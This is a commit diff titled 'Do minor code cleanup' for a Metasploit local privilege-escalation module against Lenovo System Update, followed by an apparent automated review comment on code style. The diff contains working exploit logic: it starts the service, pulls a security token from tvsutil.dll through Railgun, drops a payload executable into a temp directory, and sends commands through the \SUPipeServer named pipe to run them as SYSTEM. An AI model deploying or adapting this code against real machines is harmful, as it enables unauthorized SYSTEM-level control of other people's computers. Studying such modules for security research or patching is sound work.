Do minor code cleanup
parent
d99eedb1e4
commit
3aa1ffb4f5
|
@ -4,25 +4,24 @@
|
|||
##
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Services
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info, {
|
||||
'Name' => 'Lenovo System Update Privilege Escalation',
|
||||
'Description' => %q{
|
||||
The named pipe, \SUPipeServer, can be accessed by normal users to interact
|
||||
with the System update service. The service provides the possibility to execute
|
||||
arbitrary commands as SYSTEM if a valid security token is provided. This token can
|
||||
be generated by calling the GetSystemInfoData function in the DLL tvsutil.dll
|
||||
|
||||
Please note that the System Update is stopped by default but can be started/stopped calling
|
||||
the Executable ConfigService.exe
|
||||
The named pipe, \SUPipeServer, can be accessed by normal users to interact with the
|
||||
System update service. The service provides the possibility to execute arbitrary
|
||||
commands as SYSTEM if a valid security token is provided. This token can be generated
|
||||
by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the
|
||||
System Update is stopped by default but can be started/stopped calling the Executable
|
||||
ConfigService.exe.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -118,13 +117,14 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
|
||||
def get_security_token(lenovo_directory)
|
||||
if not client.railgun.get_dll('tvsutil') then
|
||||
unless client.railgun.get_dll('tvsutil')
|
||||
client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
|
||||
client.railgun.add_function("tvsutil", "GetSystemInfoData", "DWORD", [["PWCHAR","systeminfo","out"]], windows_name = nil, calling_conv = "cdecl")
|
||||
client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], windows_name = nil, calling_conv = 'cdecl')
|
||||
end
|
||||
|
||||
dll_response = client.railgun.tvsutil.GetSystemInfoData(256)
|
||||
return dll_response['systeminfo'][0,40]
|
||||
|
||||
dll_response['systeminfo'][0,40]
|
||||
end
|
||||
|
||||
|
||||
|
@ -139,23 +139,23 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
su_directory = service_info('SUService')[:path][1..-16]
|
||||
print_status("Starting service via ConfigService.exe")
|
||||
config_service(su_directory, "start")
|
||||
print_status("Giving the service some time to start...")
|
||||
sleep(datastore['sleep'])
|
||||
print_status('Starting service via ConfigService.exe')
|
||||
config_service(su_directory, 'start')
|
||||
|
||||
print_status('Giving the service some time to start...')
|
||||
Rex.sleep(datastore['Sleep'])
|
||||
|
||||
print_status("Getting security token...")
|
||||
token = get_security_token(su_directory)
|
||||
vprint_good("Security token is: #{token}")
|
||||
|
||||
|
||||
if datastore['WritableDir'] and not datastore['WritableDir'].empty?
|
||||
temp_dir = datastore['WritableDir']
|
||||
else
|
||||
if datastore['WritableDir'].nil? || datastore['WritableDir'].empty?
|
||||
temp_dir = get_env('TEMP')
|
||||
else
|
||||
temp_dir = datastore['WritableDir']
|
||||
end
|
||||
|
||||
print_status("Using #{temp_dir} to drop malicious exe")
|
||||
print_status("Using #{temp_dir} to drop the payload")
|
||||
|
||||
begin
|
||||
cd(temp_dir)
|
||||
|
@ -186,8 +186,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
fail_with(Failure::Unknown, 'Failed to write to pipe')
|
||||
end
|
||||
|
||||
print_status("Stopping service via ConfigService.exe")
|
||||
config_service(su_directory, "stop")
|
||||
print_status('Stopping service via ConfigService.exe')
|
||||
config_service(su_directory, 'stop')
|
||||
end
|
||||
|
||||
end
|
||||
|
|
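Review bot: The `add_function` call in `get_security_token` (second hunk, `@ -118,13 +117,14 @@`) still passes `windows_name = nil, calling_conv = 'cdecl'` as positional arguments; Ruby evaluates those as local assignments, so they create two unused locals and read as if Railgun accepted keyword parameters, which it does not here. For a cleanup commit the arguments should be plain positionals: `client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], nil, 'cdecl')`. The `[0,40]` slice of `dll_response['systeminfo']` on the returned line is a magic number that deserves a comment, e.g. `# token is presumably the first 40 bytes of the 256-byte out buffer — confirm against tvsutil.dll`, and the DWORD return value of `GetSystemInfoData` is discarded without a check, which may be intentional but is worth stating in the same comment. `get_security_token` is wholly contained in the hunk.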